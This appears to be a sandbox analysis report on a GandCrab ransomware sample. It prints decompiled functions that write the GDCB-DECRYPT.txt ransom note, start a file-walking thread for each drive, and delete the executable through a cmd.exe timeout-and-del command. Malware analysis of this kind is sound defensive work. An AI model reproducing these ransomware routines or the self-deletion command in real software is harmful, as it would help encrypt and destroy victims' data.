Instruction ID: 1d4d8119c528933caeb75f04f88e4e179bdf36d9628e715462df4c3d01f9fdbf
Opcode Fuzzy Hash: 32dcfbf585654d6e4030448062329cf6c673588d1b1bc6fd82f11e3cc728f5a5
Instruction Fuzzy Hash: 16212F2078531223FA2432A62D6EBBF498F8BD5781F644121BA12EE2C1FE54CC064355

Uniqueness

Uniqueness Score: -1.00%

Function 00A86BA0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A86BA0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x00a86ba0
0x00a86ba8
0x00a86baa
0x00a86bae
0x00a86bb3
0x00a86bc1
0x00a86bc4
0x00a86bc9
0x00a86bc9
0x00a86bcf
0x00a86bd9
0x00a86be0
0x00a86be4
0x00a86be7
0x00a86be7
0x00a86bed
0x00a86bfb
0x00a86bfd
0x00a86c05
0x00a86c08
0x00a86c08
0x00a86c0e
0x00a86c1c
0x00a86c1e
0x00a86c26
0x00a86c29
0x00a86c29
0x00a86c2f
0x00a86c3d
0x00a86c3f
0x00a86c47
0x00a86c4a
0x00a86c4a
0x00a86c50
0x00a86c5e
0x00a86c60
0x00a86c68
0x00a86c6b
0x00a86c6b
0x00a86c71
0x00a86c7f
0x00a86c81
0x00a86c89
0x00a86c8c
0x00a86c8c
0x00a86c92
0x00a86ca0
0x00a86ca2
0x00a86caa
0x00a86cad
0x00a86cad
0x00a86cb3
0x00a86cb5
0x00a86cb5
0x00a86cbc
0x00a86cca
0x00a86ccc
0x00a86cd4
0x00a86cd7
0x00a86cd7
0x00a86ce0
0x00a86d0c
0x00a86ce2
0x00a86ce8
0x00a86d06
0x00a86d06

APIs

lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86BF2
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86BFD
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C13
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C1E
lstrlenW.KERNEL32(00A848B6,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C34
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C3F
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C55
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C60
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C76
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C81
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C97
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CA2
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CC1
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CCC
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CE8
lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CF6

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 743b4fa664b870bf574479bc5761c84fd1c513f8d9e5ea7a023bcf3fac78b9a5
Instruction ID: 2c373d7920fd9854e026a5a61ae2c3132fee643da83a92a51195dae6e291e3a5
Opcode Fuzzy Hash: 743b4fa664b870bf574479bc5761c84fd1c513f8d9e5ea7a023bcf3fac78b9a5
Instruction Fuzzy Hash: E4412B72200611EFD712AFA8DD8C7A5BBB2FF04319F1C4538E416A2A24D771A879DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A85270 Relevance: 18.1, APIs: 12, Instructions: 92
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A85270(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}

0x00a85287
0x00a8528f
0x00a85299
0x00a8529c
0x00a852bb
0x00a852bd
0x00a852c3
0x00a852d4
0x00a852da
0x00a852df
0x00a852ea
0x00a852f0
0x00a852f5
0x00a852f7
0x00a852f7
0x00a852fb
0x00a852fe
0x00a85305
0x00a85307
0x00a85312
0x00a85314
0x00a85316
0x00a85319
0x00a85323
0x00a8531b
0x00a8531b
0x00a8531d
0x00a8531e
0x00a8531e
0x00a85328
0x00a85329
0x00a8532f
0x00a85334
0x00a85316
0x00a8533b
0x00a85341
0x00a85344
0x00a85344
0x00a8534a
0x00a8534a
0x00a85351
0x00a85351
0x00a8536b

APIs

VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,746981D0,00000000,?,?,?,?,00A85482), ref: 00A85289
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,00A85482), ref: 00A8529C
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00A85482), ref: 00A852B5
CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,00A85482), ref: 00A852D4
MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00A85482), ref: 00A852EA
lstrlenW.KERNEL32(?,?,?,?,?,00A85482), ref: 00A852FE
lstrlenA.KERNEL32(0000004E,?,?,?,?,00A85482), ref: 00A8530A
lstrlenA.KERNEL32(0000004E,?,?,?,?,00A85482), ref: 00A85329
UnmapViewOfFile.KERNEL32(?,?,?,?,?,00A85482), ref: 00A8533B
CloseHandle.KERNEL32(?,?,?,?,?,00A85482), ref: 00A8534A
CloseHandle.KERNEL32(00000000,?,?,?,?,00A85482), ref: 00A85351
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00A85482), ref: 00A8535F

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
String ID:
API String ID: 869890170-0
Opcode ID: fab7faa89cdf9c047e2284bd07e27b2707ca8860c79dea03236c33272a22c857
Instruction ID: cb00c6e621648e4e072b3d6d584cd54021688e0c6e3f623b73653af0c002cb46
Opcode Fuzzy Hash: fab7faa89cdf9c047e2284bd07e27b2707ca8860c79dea03236c33272a22c857
Instruction Fuzzy Hash: 0A31A531A84715BBEB219BF49C4EF6E7B78EB05B41F280154FB41BA1D1C7F1A5028B68

Uniqueness

Uniqueness Score: -1.00%

Function 00A86640 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A86640(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xa92b04; // 0xa92000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xa92b04, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x00a8665b
0x00a86663
0x00a86685
0x00a8668a
0x00a8669e
0x00a866a5
0x00a866be
0x00a866be
0x00a866c5
0x00a866cb
0x00a8668c
0x00a86699
0x00a86699
0x00a866d8
0x00a866e6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00A86722,00000000,?,?), ref: 00A86655
wsprintfW.USER32 ref: 00A86663
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 00A8667F
GetLastError.KERNEL32(?,?), ref: 00A8668C
lstrlenW.KERNEL32(00A92000,?,00000000,?,?), ref: 00A866AE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 00A866BE
CloseHandle.KERNEL32(00000000,?,?), ref: 00A866C5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 00A866D8

Strings

%s\GDCB-DECRYPT.txt, xrefs: 00A8665D

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\GDCB-DECRYPT.txt
API String ID: 2985722263-4054134092
Opcode ID: f1119ce56350737949929a6c1661360f7d2176df492f298b02be078a9d07b00b
Instruction ID: 53bf1f7d64ce3d824d12fbf7ec4dc7ea303c4eff13bb6986e683ac6572b4dc6b
Opcode Fuzzy Hash: f1119ce56350737949929a6c1661360f7d2176df492f298b02be078a9d07b00b
Instruction Fuzzy Hash: 4301D4753843007BF7209BA4AC8EF7B3AACEB49B11F140220FB05E91D0DBA568068769

Uniqueness

Uniqueness Score: -1.00%

Function 00A84FD0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A84FD0() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x00a84ff6
0x00a84ffa
0x00a84ffe
0x00a85008
0x00a85010
0x00a85019
0x00a85033
0x00a85033
0x00a85010
0x00a8503b

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,00A8526B,00000000), ref: 00A84FE6
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00A84FF8
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00A85008
wsprintfW.USER32 ref: 00A85019
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00A85033
ExitProcess.KERNEL32 ref: 00A8503B

Strings

/c timeout -c 5 & del "%s" /f /q, xrefs: 00A85013
cmd.exe, xrefs: 00A85027
open, xrefs: 00A8502C

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: f787dad9621e082d1a1957f34ceb4cf9a941400be1ec3233e11f4582ddea9cb3
Instruction ID: e2b8c0fdd4b2340ea91006ba9e3691e7048fe314de04e22df9170cb85289e4d7
Opcode Fuzzy Hash: f787dad9621e082d1a1957f34ceb4cf9a941400be1ec3233e11f4582ddea9cb3
Instruction Fuzzy Hash: 65F03031BC971277F2716BE05C0FF572D28AB85F56F180500B7057E1C086E0690187E9

Uniqueness

Uniqueness Score: -1.00%

Function 00A82C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00A82C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xa8e290; // 0x21
				asm("movdqu xmm0, [0xa8e280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E00A82AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x00a82c59
0x00a82c5e
0x00a82c66
0x00a82c69
0x00a82c70
0x00a82c76
0x00a82c79
0x00a82ce9
0x00a82cf2
0x00a82d01
0x00a82c7b
0x00a82c7e
0x00a82c9f
0x00a82cbd
0x00a82ccb
0x00a82cd7
0x00a82c80
0x00a82c94
0x00a82c94
0x00a82c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00A82C8A
BeginPaint.USER32(?,?), ref: 00A82C9F
lstrlenW.KERNEL32(?), ref: 00A82CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 00A82CBD
EndPaint.USER32(?,?), ref: 00A82CCB
CreateThread.KERNEL32 ref: 00A82CE9
DestroyWindow.USER32(?), ref: 00A82CF2

Strings

GandCrab!, xrefs: 00A82C5E

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 5243ced6017088a74f08d6b8bdf83e85e9f0d541d634f7b97d5ba1e42be0509d
Instruction ID: a52d64f0d49ee1023629465f339fbe997bf7e5bbd5a0554946cc915698d88142
Opcode Fuzzy Hash: 5243ced6017088a74f08d6b8bdf83e85e9f0d541d634f7b97d5ba1e42be0509d
Instruction Fuzzy Hash: D4118B32508209ABE710EFA8EC0EFBB7BA8FB48311F040616FD45D61A0E7719921CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A83DE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00A83DE0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				intOrPtr _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xa8e308; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E00A86840, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E00A85540(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x00a83de6
0x00a83df8
0x00a83dfc
0x00a83e00
0x00a83e0b
0x00a83e0e
0x00a83e10
0x00a83e13
0x00a83e18
0x00a83e1c
0x00a83e21
0x00a83e2b
0x00a83e2f
0x00a83e36
0x00a83e40
0x00a83e44
0x00a83e4a
0x00a83e53
0x00a83e62
0x00a83e65
0x00a83e72
0x00a83e75
0x00a83e7b
0x00a83e82
0x00a83e8f
0x00a83e93
0x00a83e94
0x00a83e94
0x00a83e97
0x00a83e98
0x00a83ea6
0x00a83eaa
0x00a83ead
0x00a83eb7
0x00a83ebf
0x00a83ec5
0x00a83ecb
0x00a83ed1
0x00a83edb
0x00a83ee2
0x00a83ee6
0x00a83eea
0x00a83eec
0x00a83ef4
0x00a83efd
0x00a83f5c
0x00a83f60
0x00a83eff
0x00a83eff
0x00a83f02
0x00a83f08
0x00a83f0f
0x00a83f10
0x00a83f17
0x00a83f1b
0x00a83f20
0x00a83f27
0x00a83f2a
0x00a83f2e
0x00a83f38
0x00a83f3a
0x00a83f3e
0x00a83f41
0x00a83f44
0x00a83f44
0x00a83f44
0x00a83f4a
0x00a83f4e
0x00a83f52
0x00a83f56
0x00a83f56
0x00a83f66
0x00a83f8a
0x00a83f68
0x00a83f68
0x00a83f72
0x00a83f76
0x00a83f7d
0x00a83f94
0x00a83f98
0x00a83fb6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 00A83E00
GetTickCount.KERNEL32 ref: 00A83E25
GetDriveTypeW.KERNEL32(?), ref: 00A83E4A
CreateThread.KERNEL32 ref: 00A83E89
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 00A83ECB
GetTickCount.KERNEL32 ref: 00A83ED1

Strings

?:\, xrefs: 00A83E13

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 02a3999d1f4bfbc8132b789af9f4f52aeecb528ff934be52b5c273533261b349
Instruction ID: 76bb0085a16f2d3031e846010886489bb01225d58e60ab907957e968eb8f44b4
Opcode Fuzzy Hash: 02a3999d1f4bfbc8132b789af9f4f52aeecb528ff934be52b5c273533261b349
Instruction Fuzzy Hash: 3A5101719083009FD310DF19C888B5BBBF5FF88714F544A2DEA899B3A0D771AA44CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00A86840 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A86840(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E00A866F0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x00a86859
0x00a8685f
0x00a8686e
0x00a8687c
0x00a86890
0x00a86898
0x00a868a0
0x00a868a8
0x00a868b6
0x00a868cb
0x00a868db
0x00a868e3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 00A86859
wsprintfW.USER32 ref: 00A8686E
InitializeCriticalSection.KERNEL32(?), ref: 00A8687C
VirtualAlloc.KERNEL32 ref: 00A868B0

Part of subcall function 00A866F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00A86723
Part of subcall function 00A866F0: lstrcatW.KERNEL32(00000000,00A90364), ref: 00A8673B
Part of subcall function 00A866F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00A86745

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 00A868DB
ExitThread.KERNEL32 ref: 00A868E3

Strings

%c:\, xrefs: 00A86868

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

